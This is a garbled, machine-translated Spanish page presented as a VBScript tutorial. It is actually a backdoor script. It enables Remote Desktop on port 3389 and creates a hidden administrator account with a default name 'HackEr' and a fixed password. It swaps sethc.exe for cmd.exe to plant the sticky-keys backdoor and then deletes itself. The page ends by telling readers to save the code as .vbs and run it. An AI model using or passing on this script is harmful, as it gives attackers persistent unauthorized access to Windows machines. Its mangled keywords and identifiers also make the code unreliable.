Tutorial de secuencias de comandos Vbs
Const HKEY_LOCAL_MACHINE = ampH80000002
strComputer = ","
Establecer StdOut = WScript. Salida estándar
set oReg = GetObject(" winmgmts: { nivel de suplantación = suplantar }!\ \ " amp_
strComputer amp" \root\default: StdRegProv ")
ruta de la tecla = " SISTEMA \ conjunto de control actual \ Control \ Terminal Server "
Oleg. CreateKey HKEY_LOCAL_MACHINE, strKeyPath
strKeyPath = " SISTEMA\conjunto de control actual\Control\Terminal Server\Wds\rdpwd\Tds\TCP"
Oleg. CreateKey HKEY_LOCAL_MACHINE, strKeyPath
strKeyPath = " SISTEMA \ conjunto de control actual \ Control \ Terminal Server \ WinStations \ RDP-Tcp "
strkey ruta = " SISTEMA \ conjunto de control actual \ Control \ Terminal Server "
valor de cadena nombre = " fDenyTSConnections "
dwValue = 0
Oleg. SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\current Control set\Control\Terminal Server\Wds\rdpwd\Tds\TCP"
strValueName = "Número de puerto"
dwValue = 3389
Oleg. SetDWORDValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, dwValue
strKeyPath = " SISTEMA\conjunto de control actual\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "Nº de puerto."
dwValue = 3389
Oleg. SetDWORDValue HKEY _ LOCAL _ MACHINE, strKeyPath, strValueName, dwValue
En caso de error, continúe con el siguiente paso
usuario y contraseña atenuados: si es Wscript.
Luego calcule: nombre de usuario = Wscript. Parámetros (0): contraseña=Wscript. argumentos (1): De lo contrario: nombre de usuario = "HackEr": contraseña = "393214425": finalizar si: establezca ws network = CreateObject("WSCRIPT.NETWORK"): OS = "win nt://" & wsnetwork. Establecer ob = GetObject(OS): Establecer OE = GetObject(OS & "/Administradores, grupo"): Establecer od=ob. Crear("usuario", nombre de usuario): od. Establecer contraseña contraseña: od. SetInfo: Conjunto de = GetObject(OS & "/" & nombre de usuario y contraseña. ", usuario"): oe. añadir (de). ADsPath) "wscript. echo of. ADsPath
Continuar con el siguiente paso en caso de error
Éxito
Establecer obj = CreateObject("WScript. Shell") p >
success = obj . run(" cmd /c takeown /f SystemRoot \ system32 \ sethc . exe & echo y | cacls SystemRoot \ system32 \ sethc . exe /G NOMBRE DE USUARIO: F ? SystemRoot \ system32 \ cmd . exe SystemRoot\system32\acmd.exe? SystemRoot\system32\sethc.exe SystemRoot\system32\as ethc.exe&del SystemRoot\system32\sethc.exe&ren SystemRoot\system32\acmd.exe sethc.exe",0, Verdadero)
CreateObject("Script.FileSystemObject"). Eliminar archivo (nombre WScript.Script)
Copie el código anterior en un txt y luego cambie la extensión de txt para .vbs y ejecútelo.